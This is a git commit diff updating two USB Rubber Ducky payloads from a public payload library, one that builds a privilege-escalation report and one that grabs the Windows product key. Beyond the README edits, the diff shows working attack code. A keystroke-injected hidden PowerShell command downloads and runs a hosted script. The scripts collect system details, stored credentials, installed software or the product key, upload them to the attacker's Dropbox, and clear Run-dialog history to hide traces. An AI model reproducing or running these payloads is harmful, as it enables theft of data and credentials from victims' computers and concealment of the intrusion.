Small updates
parent
ea737c4c6d
commit
3da90fee4d
|
@ -2,10 +2,13 @@
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt">
|
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt">
|
||||||
<img alt="View on: Payload Studio" src="https://img.shields.io/badge/View_on-Payload_Studio-red?style=flat-square">
|
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
|
||||||
</a>
|
</a>
|
||||||
<a href="#">
|
<a href="#">
|
||||||
<img alt="Target: Windows 10, 11" src="https://img.shields.io/badge/Target-Windows_10,_11-blue?style=flat-square">
|
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
|
||||||
|
</a>
|
||||||
|
<a href="#">
|
||||||
|
<img alt="VERSION: 1.3" src="https://img.shields.io/badge/VERSION-1.3-green?style=for-the-badge">
|
||||||
</a>
|
</a>
|
||||||
</p>
|
</p>
|
||||||
|
|
||||||
|
@ -16,10 +19,9 @@ This payload sends you a brief user privilege escalation report via Dropbox. Onc
|
||||||
|System Information|[WES-NG](https://github.com/bitsadmin/wesng)|
|
|System Information|[WES-NG](https://github.com/bitsadmin/wesng)|
|
||||||
|User Information|[Priv2Admin](https://github.com/gtworek/Priv2Admin)|
|
|User Information|[Priv2Admin](https://github.com/gtworek/Priv2Admin)|
|
||||||
|Stored Credentials||
|
|Stored Credentials||
|
||||||
|Installed Programs|[Exploit Database](https://www.exploit-db.com) & [Packet Storm](https://packetstormsecurity.com)|
|
|Installed Programs|[Exploit Database](https://www.exploit-db.com/) & [Packet Storm](https://packetstormsecurity.com/)|
|
||||||
|
|
||||||
<details>
|
## Process
|
||||||
<summary>Extension operation</summary>
|
|
||||||
|
|
||||||
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
|
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
|
||||||
2. Opens a Windows Run dialog box.
|
2. Opens a Windows Run dialog box.
|
||||||
|
@ -28,14 +30,12 @@ This payload sends you a brief user privilege escalation report via Dropbox. Onc
|
||||||
- Prepares a report on target PC user privilege escalation.
|
- Prepares a report on target PC user privilege escalation.
|
||||||
- Sends the report to a file in your Dropbox.
|
- Sends the report to a file in your Dropbox.
|
||||||
|
|
||||||
</details>
|
|
||||||
|
|
||||||
## Prerequisites
|
## Prerequisites
|
||||||
|
|
||||||
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox).
|
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
|
||||||
Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
|
|
||||||
|
|
||||||
> Note: If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
|
> [!WARNING]
|
||||||
|
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
|
@ -45,4 +45,4 @@ Once you get them, you need to download the "script.ps1" file for this payload a
|
||||||
|
|
||||||
## Contributors
|
## Contributors
|
||||||
|
|
||||||
- [@PlumpyTurkey](https://github.com/PlumpyTurkey)
|
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)
|
||||||
|
|
|
@ -89,6 +89,7 @@ EXTENSION RUN_HOSTED_POWERSHELL
|
||||||
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
|
|
||||||
DELAY #RHP_DELAY
|
DELAY #RHP_DELAY
|
||||||
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
||||||
|
|
||||||
|
|
|
@ -3,34 +3,33 @@ $APP_KEY = "XXXXXXXXXXXXXXX"
|
||||||
$APP_SECRET = "XXXXXXXXXXXXXXX"
|
$APP_SECRET = "XXXXXXXXXXXXXXX"
|
||||||
|
|
||||||
function Send-ToDropbox {
|
function Send-ToDropbox {
|
||||||
#Documentation: https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox
|
|
||||||
|
|
||||||
[CmdletBinding()]
|
[CmdletBinding()]
|
||||||
param(
|
param(
|
||||||
|
[Parameter(Mandatory = $true)]
|
||||||
|
[string]$Content,
|
||||||
[Parameter(Mandatory = $true)]
|
[Parameter(Mandatory = $true)]
|
||||||
[string]$RefreshToken,
|
[string]$RefreshToken,
|
||||||
[Parameter(Mandatory = $true)]
|
[Parameter(Mandatory = $true)]
|
||||||
[string]$AppKey,
|
[string]$AppKey,
|
||||||
[Parameter(Mandatory = $true)]
|
[Parameter(Mandatory = $true)]
|
||||||
[string]$AppSecret,
|
[string]$AppSecret,
|
||||||
[Parameter(Mandatory = $true)]
|
|
||||||
[string]$Content,
|
|
||||||
[string]$OutputFolder = "Exfiltrated-content",
|
[string]$OutputFolder = "Exfiltrated-content",
|
||||||
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
|
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
|
||||||
)
|
)
|
||||||
|
|
||||||
try {
|
try {
|
||||||
$AccessToken = (Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
|
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
|
||||||
|
"Authorization" = "Bearer $((
|
||||||
|
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
|
||||||
"Content-Type" = "application/x-www-form-urlencoded"
|
"Content-Type" = "application/x-www-form-urlencoded"
|
||||||
} -Body @{
|
} -Body @{
|
||||||
"grant_type" = "refresh_token"
|
"grant_type" = "refresh_token";
|
||||||
"refresh_token" = $RefreshToken
|
"refresh_token" = $RefreshToken;
|
||||||
"client_id" = $AppKey
|
"client_id" = $AppKey;
|
||||||
"client_secret" = $AppSecret
|
"client_secret" = $AppSecret
|
||||||
}).access_token
|
}
|
||||||
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
|
).access_token)";
|
||||||
"Authorization" = "Bearer $AccessToken"
|
"Content-Type" = "application/octet-stream";
|
||||||
"Content-Type" = "application/octet-stream"
|
|
||||||
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
|
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
|
||||||
} -Body $Content | Out-Null
|
} -Body $Content | Out-Null
|
||||||
}
|
}
|
||||||
|
@ -39,6 +38,7 @@ function Send-ToDropbox {
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||||
|
|
||||||
$Report = "*** System Information ***`n $(SYSTEMINFO | Out-String)`n"
|
$Report = "*** System Information ***`n $(SYSTEMINFO | Out-String)`n"
|
||||||
|
@ -46,4 +46,4 @@ $Report += "*** User Information ***`n $(WHOAMI /ALL | Out-String)`n"
|
||||||
$Report += "*** Stored Credentials ***`n $(CMDKEY /LIST | Out-String)`n"
|
$Report += "*** Stored Credentials ***`n $(CMDKEY /LIST | Out-String)`n"
|
||||||
$Report += "*** Installed Programs ***`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
|
$Report += "*** Installed Programs ***`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
|
||||||
|
|
||||||
Send-ToDropbox -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET -Content $Report
|
Send-ToDropbox -Content $Report -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET
|
||||||
|
|
|
@ -2,17 +2,19 @@
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt">
|
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt">
|
||||||
<img alt="View on: Payload Studio" src="https://img.shields.io/badge/View_on-Payload_Studio-red?style=flat-square">
|
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
|
||||||
</a>
|
</a>
|
||||||
<a href="#">
|
<a href="#">
|
||||||
<img alt="Target: Windows 10, 11" src="https://img.shields.io/badge/Target-Windows_10,_11-blue?style=flat-square">
|
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
|
||||||
|
</a>
|
||||||
|
<a href="#">
|
||||||
|
<img alt="VERSION: 1.0" src="https://img.shields.io/badge/VERSION-1.0-green?style=for-the-badge">
|
||||||
</a>
|
</a>
|
||||||
</p>
|
</p>
|
||||||
|
|
||||||
This payload sends you the target PC's Windows product key via Dropbox.
|
This payload sends you the target PC's Windows product key via Dropbox.
|
||||||
|
|
||||||
<details>
|
## Process
|
||||||
<summary>Extension operation</summary>
|
|
||||||
|
|
||||||
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
|
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
|
||||||
2. Opens a Windows Run dialog box.
|
2. Opens a Windows Run dialog box.
|
||||||
|
@ -21,14 +23,12 @@ This payload sends you the target PC's Windows product key via Dropbox.
|
||||||
- Recovers Windows product key from target PC.
|
- Recovers Windows product key from target PC.
|
||||||
- Sends the Windows product key of the target PC to a file in your Dropbox.
|
- Sends the Windows product key of the target PC to a file in your Dropbox.
|
||||||
|
|
||||||
</details>
|
|
||||||
|
|
||||||
## Prerequisites
|
## Prerequisites
|
||||||
|
|
||||||
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox).
|
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
|
||||||
Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
|
|
||||||
|
|
||||||
> Note: If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
|
> [!WARNING]
|
||||||
|
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
|
@ -38,4 +38,4 @@ Once you get them, you need to download the "script.ps1" file for this payload a
|
||||||
|
|
||||||
## Contributors
|
## Contributors
|
||||||
|
|
||||||
- [@PlumpyTurkey](https://github.com/PlumpyTurkey)
|
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)
|
||||||
|
|
|
@ -89,6 +89,7 @@ EXTENSION RUN_HOSTED_POWERSHELL
|
||||||
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
|
|
||||||
DELAY #RHP_DELAY
|
DELAY #RHP_DELAY
|
||||||
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
||||||
|
|
||||||
|
|
|
@ -3,34 +3,33 @@ $APP_KEY = "XXXXXXXXXXXXXXX"
|
||||||
$APP_SECRET = "XXXXXXXXXXXXXXX"
|
$APP_SECRET = "XXXXXXXXXXXXXXX"
|
||||||
|
|
||||||
function Send-ToDropbox {
|
function Send-ToDropbox {
|
||||||
#Documentation: https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox
|
|
||||||
|
|
||||||
[CmdletBinding()]
|
[CmdletBinding()]
|
||||||
param(
|
param(
|
||||||
|
[Parameter(Mandatory = $true)]
|
||||||
|
[string]$Content,
|
||||||
[Parameter(Mandatory = $true)]
|
[Parameter(Mandatory = $true)]
|
||||||
[string]$RefreshToken,
|
[string]$RefreshToken,
|
||||||
[Parameter(Mandatory = $true)]
|
[Parameter(Mandatory = $true)]
|
||||||
[string]$AppKey,
|
[string]$AppKey,
|
||||||
[Parameter(Mandatory = $true)]
|
[Parameter(Mandatory = $true)]
|
||||||
[string]$AppSecret,
|
[string]$AppSecret,
|
||||||
[Parameter(Mandatory = $true)]
|
|
||||||
[string]$Content,
|
|
||||||
[string]$OutputFolder = "Exfiltrated-content",
|
[string]$OutputFolder = "Exfiltrated-content",
|
||||||
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
|
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
|
||||||
)
|
)
|
||||||
|
|
||||||
try {
|
try {
|
||||||
$AccessToken = (Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
|
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
|
||||||
|
"Authorization" = "Bearer $((
|
||||||
|
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
|
||||||
"Content-Type" = "application/x-www-form-urlencoded"
|
"Content-Type" = "application/x-www-form-urlencoded"
|
||||||
} -Body @{
|
} -Body @{
|
||||||
"grant_type" = "refresh_token"
|
"grant_type" = "refresh_token";
|
||||||
"refresh_token" = $RefreshToken
|
"refresh_token" = $RefreshToken;
|
||||||
"client_id" = $AppKey
|
"client_id" = $AppKey;
|
||||||
"client_secret" = $AppSecret
|
"client_secret" = $AppSecret
|
||||||
}).access_token
|
}
|
||||||
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
|
).access_token)";
|
||||||
"Authorization" = "Bearer $AccessToken"
|
"Content-Type" = "application/octet-stream";
|
||||||
"Content-Type" = "application/octet-stream"
|
|
||||||
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
|
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
|
||||||
} -Body $Content | Out-Null
|
} -Body $Content | Out-Null
|
||||||
}
|
}
|
||||||
|
@ -39,9 +38,10 @@ function Send-ToDropbox {
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||||
|
|
||||||
$ProductKey = "Original Product Key: $((Get-WmiObject -Query 'select * from SoftwareLicensingService').OA3xOriginalProductKey | Out-String)`n"
|
$ProductKey = "Original Product Key: $((Get-WmiObject -Query 'select * from SoftwareLicensingService').OA3xOriginalProductKey | Out-String)`n"
|
||||||
$ProductKey += "Backup Product Key: $((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform').BackupProductKeyDefault | Out-String)"
|
$ProductKey += "Backup Product Key: $((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform').BackupProductKeyDefault | Out-String)"
|
||||||
|
|
||||||
Send-ToDropbox -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET -Content $ProductKey
|
Send-ToDropbox -Content $ProductKey -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET
|
||||||
|
|
Loading…
Reference in New Issue